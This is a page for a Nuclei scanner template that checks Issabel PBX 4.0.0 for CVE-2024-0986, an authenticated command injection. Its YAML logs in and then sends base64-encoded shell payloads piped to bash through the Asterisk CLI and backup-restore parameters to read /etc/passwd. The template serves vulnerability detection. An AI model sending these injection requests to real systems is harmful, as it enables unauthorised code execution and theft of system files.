Skip to content
Nuclei Templates

Issabel Authenticated - Remote Code Execution

ID: CVE-2024-0986

Severity: medium

Author: eunji

Tags: cve,cve2024,isssabel,authenticated,rce,asterisk

Description

Section titled “Description”

A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE- The vendor was contacted early about this disclosure but did not respond in any way.

YAML Source

Section titled “YAML Source”
id: CVE-2024-0986


info:
  name: Issabel Authenticated - Remote Code Execution
  author: eunji
  severity: medium
  description: |
    A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE- The vendor was contacted early about this disclosure but did not respond in any way.
  reference:
    - https://github.com/issabel-org/issabel/issues
    - https://vuldb.com/?ctiid.252251
    - https://vuldb.com/?id.252251
    - https://www.vicarius.io/vsociety/posts/issabel-authenticated-remote-code-execution-cve-2024-0986
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0986
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 4.7
    cve-id: CVE-2024-0986
    cwe-id: CWE-78
    epss-score: 0.17819
    epss-percentile: 0.96146
    cpe: cpe:2.3:a:issabel:pbx:4.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: issabel
    product: pbx
    fofa-query: title="issabel"
  tags: cve,cve2024,isssabel,authenticated,rce,asterisk


variables:
  username: "{{username}}"
  password: "{{password}}"


http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        input_user={{username}}&input_pass={{password}}&submit_login=


      - |
        POST /index.php?menu=asterisk_cli HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        txtCommand=xmldoc+dump+%2Fvar%2Fwww%2Fbackup%2Fx%7C%7Becho%2CY2F0IC4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q%3D%7D%7C%7Bbase64%2C-d%7D%7Cbash


      - |
        GET /modules/backup_restore/restore.php?filename=x%7C%7Becho,Y2F0IC4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=%7D%7C%7Bbase64,-d%7D%7Cbash HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a004730450220405d51ea6abdc8495bf55fa41177fdcd444aa4f418f1652aab6631426e9d7fd3022100d26ec117534329c4f6d52b0f3f58915554a06eb13184a1a7b40f544272821b78:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-0986.yaml"

View on Github